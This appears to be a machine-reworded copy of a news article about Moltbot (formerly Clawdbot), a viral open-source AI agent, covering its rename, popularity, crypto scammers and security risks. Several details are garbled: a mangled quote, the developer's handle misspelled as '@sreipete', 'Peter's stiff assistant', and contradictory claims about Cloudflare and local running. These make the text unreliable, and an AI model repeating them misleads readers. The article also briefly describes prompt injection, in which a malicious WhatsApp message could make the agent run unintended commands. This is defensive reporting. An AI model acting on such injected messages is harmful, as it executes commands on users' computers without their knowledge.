The latest wave of AI excitement has brought us an unexpected mascot: the lobster. Clawdbot, a personal AI assistant that went viral within weeks of its launch, plans to keep its crustacean theme despite having to change its name to Moltbot following a legal challenge from Anthropic. But before you jump on the bandwagon, there are things you should know.
According to its tagline, Moltbot (formerly Clawdbot) is an “AI that actually does things,” like managing your calendar, sending messages through your favorite apps, and checking in for flights. Although this promise began as a crude personal project built for himself by one developer, it attracted thousands of users willing to work through the necessary technical setup.
The man is Peter Steinberger, an Austrian developer and founder known online as @sreipete who actively blogs about his work. After leaving his previous project, PSPDFkit, Steinberger felt empty and barely touched a computer for three years, Steinberger explained in his blog. But eventually he found his spark again, which led to Moltbot.
Although Moltbot is now much more than a standalone project, the publicly available version is still an outgrowth of “Peter’s stiff assistant” Clawd (now called Molty), a tool he built to help “manage your digital life” and “explore what human-AI collaboration looks like.”
For Steinberger, this meant diving deeper into the momentum around AI that rekindled his builder spark. A self-confessed “claudeholic,” he originally named the project after Anthropic’s AI flagship product, Claude. He revealed in “X” that Anthropic forced him to change the brand for copyright reasons. TechCrunch has reached out to Anthropic for comment. However, the “lobster spirit” of the project remains the same.
For early adopters, Moltbot is a harbinger of how helpful AI assistants can be. People who were already excited about the prospect of using AI to quickly generate websites and apps are now even more eager to have their personal AI assistants perform their tasks for them. And just like Steinberger, they’re keen to tinker with it.
This explains how Moltbot quickly gathered over 44,200 stars on GitHub. Moltbot has gained so much attention that it has moved the market. Cloudflare stock rose 14% in pre-market trading on Tuesday as social media buzz about the AI agent reignited investor enthusiasm for Cloudflare’s infrastructure, which developers use to run Moltbot locally on their devices.
tech crunch event
san francisco
|
October 13-15, 2026
Still, it’s a long way from breaking into early adopter territory, but maybe that’s for the best. Installing Moltbot requires being tech-savvy, which includes being aware of the inherent security risks that come with it.
On the one hand, Moltbot is built with safety in mind. Moltbot is open source, so anyone can inspect its code for vulnerabilities, and it runs on your computer or server, not in the cloud. But on the other hand, that premise itself is inherently dangerous. As entrepreneur and investor Rahul Sood pointed out in X, “‘actually doing something’ means ‘being able to run arbitrary commands on a computer.'”
The reason Sood keeps waking up at night is because of “content-driven prompt injection.” A malicious person could send a WhatsApp message that could cause Moltbot to perform unintended actions on your computer without your intervention or knowledge.
This risk can be partially mitigated with careful setup. Moltbot supports a variety of AI models, allowing users to choose a setup based on its resistance to this type of attack. However, the only way to completely prevent this is to run Moltbot in a silo.
While this may be obvious to experienced developers tinkering with weeks-old projects, some developers are more vocal in warning users who have fallen for the hype. If you approach it as carelessly as ChatGPT, things can get ugly quickly.
Steinberger himself served as a reminder of the existence of malicious actors when he “failed” to rename the project. He accused “cryptocurrency scammers” of taking his GitHub username and creating a fake cryptocurrency project in his name, telling his followers: [him] Because the coin owner is a scammer. ” He later posted that the GitHub issue had been fixed, but warned that the legitimate X account was @moltbot and “not one of those 20 scams.”
This doesn’t mean you should avoid Moltbot at this stage if you want to test it. But if you’ve never heard of a VPS (virtual private server, a remote computer you rent to run software), you might want to wait your turn. (You might want to run Moltbot here. “It’s not a laptop with SSH keys, API credentials, or a password manager,” Sood warned.)
Currently, running Moltbot securely means running it on a separate computer using a single-use account, which defeats the purpose of having a useful AI assistant. And fixing the security-utility trade-off may require solutions beyond Steinberger’s control.
Still, by building tools to solve his own problems, Steinberger showed the developer community what AI agents can actually accomplish, and how autonomous AI could eventually become truly useful rather than just impressive.
Source link
